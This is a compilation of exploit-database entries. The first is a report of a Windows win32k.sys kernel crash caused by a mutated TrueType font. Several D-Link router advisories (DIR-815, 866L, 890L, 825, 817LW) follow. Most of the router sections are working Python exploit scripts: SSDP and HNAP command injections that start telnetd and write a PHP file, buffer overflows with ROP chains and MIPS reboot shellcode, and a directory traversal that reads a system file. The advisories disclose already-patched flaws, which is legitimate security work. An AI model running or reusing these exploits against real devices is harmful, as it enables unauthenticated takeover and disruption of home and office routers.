Source: https://code.google.com/p/google-security-research/issues/detail?id=506 We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below: --- PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This cannot be protected by try-except, it must be protected by a Probe. Typically the address is just plain bad or it is pointing at freed memory. Arguments: Arg1: fffff900c4c31000, memory referenced. Arg2: 0000000000000001, value 0 = read operation, 1 = write operation. Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory address. Arg4: 0000000000000000, (reserved) [...] FAULTING_IP: win32k!memmove+64 fffff960`00156a34 488901 mov qword ptr [rcx],rax MM_INTERNAL_CODE: 0 DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT BUGCHECK_STR: 0x50 CURRENT_IRQL: 0 TRAP_FRAME: fffff880074a0210 -- (.trap 0xfffff880074a0210) .trap 0xfffff880074a0210 NOTE: The trap frame does not contain all registers. Some register values may be zeroed or incorrect. rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000 rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000 rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010 r8=0000000000000018 r9=0000000000000001 r10=fffff900c4c211a8 r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na pe nc win32k!memmove+0x64: fffff960`00156a34 488901 mov qword ptr [rcx],rax ds:a020:fffff900`c4c31000=???????????????? .trap Resetting default scope LAST_CONTROL_TRANSFER: from fffff800028fa017 to fffff8000287d5c0 STACK_TEXT: fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64 fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138 fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3 fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7 fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168 fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350 fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275 fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237 fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13 00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a --- We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack: --- 9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56 9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190 9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb 9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114 9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60 9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall --- While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table. The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes. Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip

## Advisory Information Title: SSDP command injection using UDP for a lot of Dlink routers including DIR-815, DIR-850L Vendors contacted: William Brown <william.brown@dlink.com> (Dlink) Release mode: Released CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description Many Dlink routers affected. Tested on DIR-815. ## Vulnerabilities Summary DIR-815,850L and most of Dlink routers are susceptible to this flaw. This allows to perform command injection using SSDP packets and on UDP. So no authentication required. Just the fact that the attacker needs to be on wireless LAN or be able to fake a request coming from internal wireless LAN using some other mechanism. ## Details # Command injection ---------------------------------------------------------------------------------------------------------------------- import socket import struct # This vulnerability is pretty much in every router that has cgibin and uses SSDP code in that cgibin. This one worked on the device dir-815. Will work only in WLAN buf = 'M-SEARCH * HTTP/1.1\r\nHOST:239.255.255.250:1900\r\nST:urn:schemas-upnp-org:service:WANIPConnection:1;telnetd -p 9094;ls\r\nMX:2\r\nMAN:"ssdp:discover"\r\n\r\n' print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("239.255.255.250", 1900)) s.send(buf) s.close() ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * Jan 22, 2015: Vulnerability found by Samuel Huntley by William Brown. * Feb 15, 2015: Vulnerability is patched by Dlink * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

## Advisory Information Title: DIR-866L Buffer overflows in HNAP and send email functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR866L -- AC1750 Wi-Fi Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issue in DIR866L firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilities in hnap and send email functionalities. An attacker needs to be on wireless LAN or management interface needs to be exposed on Internet to exploit HNAP vulnerability but it requires no authentication. The send email buffer overflow does require the attacker to be on wireless LAN or requires to trick administrator to exploit using XSRF. ## Details HNAP buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+=struct.pack(">I",0x2abfc9f4) # s0 ROP 2 which loads S2 with sleep address buf+="\x2A\xBF\xB9\xF4" #s1 useless buf+=struct.pack(">I",0x2ac14c30) # s2 Sleep address buf+="DDDD" #s3 buf+=struct.pack(">I",0x2ac0fb50) # s4 ROP 4 finally loads the stack pointer into PC buf+=struct.pack(">I",0x2ac0cacc) # retn Loads s0 with ROP2 and ao with 2 for sleep buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGG" #This is the padding as SP is added with 32 bytes in ROP 1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # This is the padding as SP is added with 36 bytes in ROP 2 buf+=struct.pack(">I",0x2abcebd0) # This is the ROP 3 which loads S4 with address of ROP 4 and then loads S2 with stack pointer address buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n" # Bad chars \x00 - \x20 # sleep address 2ac14c30 print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- # Send email buffer overflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Observe this in a emulator/debugger or real device/debugger buf = "GET /send_log_email.cgi?test=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" buf+="1111" #s0 Loaded argument in S0 which is loaded in a0 buf+=struct.pack(">I",0x2ac14c30) #s4 Sleep address 0x2ac14c30 buf+="XXXX" buf+="FFFF" # s3 buf+="XXXX" buf+="BBBB" # s5 buf+="CCCC" # s6 buf+="DDDD" # s7 buf+="DDDD" # extra pad buf+=struct.pack(">I",0x2ABE94B8) # Retn address 2ABE94B8 ROP1 buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="EEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" # buf+="XXXX" # buf+="BBBBBBBBBBBBBBBB" #16 bytes before shellcode buf+="CCCCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

## Advisory Information Title: DIR-890L/R Buffer overflows in authentication and HNAP functionalities. Date published: July,17th, 2015 Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-890L/R -- AC3200 Ultra Wi-Fi Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 2 security issues in DIR-880 firmware which allows an attacker to exploit buffer overflows in authentication and HNAP functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. Also this exploit needs to be run atleast 200-500 times to bypass ASLR on ARM based devices. But it works as the buffer overflow happens in a seperate process than web server which does not allow web server to crash and hence attacker wins. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct buf = "GET /webfa_authentication.cgi?id=" buf+="A"*408 buf+="\x44\x77\xf9\x76" # Retn pointer (ROP1) which loads r0-r6 and pc with values from stack buf+="sh;#"+"CCCC"+"DDDD" #R0-R2 buf+="\x70\x82\xFD\x76"+"FFFF"+"GGGG" #R3 with system address and R4 and R5 with junk values buf+="HHHH"+"\xF8\xD0\xF9\x76" # R6 with crap and PC address loaded with ROP 2 address buf+="telnetd%20-p%209092;#" #actual payload which starts telnetd buf+="C"+"D"*25+"E"*25 + "A"*80 # 131 bytes of extra payload left buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Currently the address of exit function in libraray used as $PC buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + "\x10\xd0\xff\x76"+"B"*220 buf+= "\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

## Advisory Information Title: DIR-825 (vC) Buffer overflows in authentication,HNAP and ping functionalities. Also a directory traversal issue exists which can be exploited Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-825 (vC) -- Wireless AC750 Dual Band Gigabit Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 4 security issues in DIR-825 firmware which allows an attacker to exploit buffer overflows in authentication, HNAP and Ping functionalities. first 2 of the buffer overflows in auth and HNAP can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. The ping functionality based buffer overflow and directory traversal would require an attacker to be on network and use XSRF to exploit buffer overflow whereas would require some sort of authentication as low privileged user atleast to exploit directory traversal. ## Details Buffer overflow in auth ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 287 + XXXX in query_string value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' buf = "GET /dws/api/Login?test=" buf+="B"*251 buf+="CCCC" #s0 buf+="FFFF" #s1 buf+="FFFF" #s2 buf+="FFFF" #s3 buf+="XXXX" #s4 buf+="HHHH" #s5 buf+="IIII" #s6 buf+="JJJJ" #s7 buf+="LLLL" buf+="\x2a\xbc\x8c\xa0" # retn address buf+="C"*24 # buf+="sh;;" buf+="K"*20 buf+="\x2a\xc0\xd2\xa0" #s1 buf+="\x2a\xc0\xd2\xa0" #s1 buf +="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC CCCCCCCCCCCCCCCCC" buf+="&password=A HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml +xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Buffer overflow in HNAP ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 4138 + XXXX in SoapAction value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' buf = "POST /HNAP1/ HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="SOAPACTION:http://purenetworks.com/HNAP1/GetDeviceSettings/"+"A"*4138+"\x2a\xbc\x8c\xa0"+"D"*834+"\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: uid:1111;\r\n" buf+="Content-Length: 13\r\n\r\ntest=test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Directory traversal ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' Useful to do directory traversal attack which is possible in html_response_page variable below which prints the conf file, but theoretically any file, most likely only after login accessible ''' payload="html_response_page=../etc/host.conf&action=do_graph_auth&login_name=test&login_pass=test1&login_n=test2&l og_pass=test3&graph_code=63778&session_id=test5&test=test" buf = "POST /apply.cgi HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: session_id=test5;\r\n" buf+="Content-Length: "+str(len(payload))+"\r\n\r\n" buf+=payload+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- Buffer overflow in ping ------------------------------------------------------------------------------------------------------------------ ---- import socket import struct ''' 282 + XXXX in ping_ipaddr value, right now only working with Exit address as sleep address has bad chars which disallows from using regular shellcode directly ''' payload="html_response_page=tools_vct.asp&action=ping_test&html_response_return_page=tools_vct.asp&ping=ping&ping_ ipaddr=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"+"\x2a\xbc\x8c\xa0"+"CCXXXXDDDDEEEE&test=test" buf = "POST /ping_response.cgi HTTP/1.1\r\n" buf+= "Host: 10.0.0.90\r\n" buf+="Proxy-Connection: keep-alive\r\n" buf+="Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==\r\n" buf+"Cache-Control: max-age=0\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n" buf+="User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\r\n" buf+="Accept-Encoding: gzip,deflate,sdch\r\n" buf+="Accept-Language: en-US,en;q=0.8\r\n" buf+="Cookie: session_id=test5;\r\n" buf+="Content-Length: "+str(len(payload))+"\r\n\r\n" buf+=payload+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("10.0.0.90", 80)) s.send(buf) soc=s.recv(2048) print soc ------------------------------------------------------------------------------------------------------------------ ---- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

## Advisory Information Title: DIR-817LW Buffer overflows and Command injection in authentication and HNAP functionalities Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares.The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR-817LW -- Wireless AC750 Dual Band Cloud Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. ## Details Buffer overflow in auth ---------------------------------------------------------------------------------------------------------------------- import socket import struct #Reboot shellcode in there buf = "GET /dws/api/Login?id=" buf+="A"*2064+"AAAA" #s0 # uclibc system address buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep buf+="\x2A\xB1\x4D\xF0" buf+="\x2A\xB1\x4D\xF0" buf+="\x2A\xB1\x4D\xF0" buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission buf+="\x2A\xB1\x4D\xF0" buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0 buf+="C"*36 # buf+="\x2A\xAC\xD5\xB4" # points to rop3 #buf+="1"*17 # exit payload buf+="E"*16 buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian buf+="Y"*120 # ROP gadget 2 that loads into $t9 buf+="&password=A HTTP/1.1\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nContent-Length:5000\r\n\r\nid="+"A"*5000+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.1.8", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Buffer overflow in HNAP ---------------------------------------------------------------------------------------------------------------------- import socket import struct # Working buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";sh;"+"B"*158 buf+="\x2A\xAF\xD0\x84" #s1 -- points to iret buf+="\x2A\xB1\x4D\xF0" #s2 -- points to sleep buf+="AAAA"+"AAAA"+"AAAA" #s3,s4,s5 buf+="\x2A\xB0\xDE\x54" # s6 filled up with pointer to rop4 which is ultimate mission buf+="AAAA" buf+="\x2A\xAC\xAD\x70" # Retn address ROP gadget 1 that loads into $a0 buf+="C"*36 buf+="\x2A\xAC\xD5\xB4" # points to rop3 buf+="C"*16 buf+="\x3c\x06\x43\x21\x34\xc6\xfe\xdc\x3c\x05\x28\x12\x34\xa5\x19\x69\x3c\x04\xfe\xe1\x34\x84\xde\xad\x24\x02\x0f\xf8\x01\x01\x01\x0c" #reboot big endian shell buf+="B"*28+"\r\n" + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.1.8", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- Command injection ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CSRF or any other trickery, but probably only works when connected to network I suppose and internal buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ';echo "<?phpinfo?>" > passwd1.php;telnetd -p 9090;test\r\n' + "1\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("1.2.3.4", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley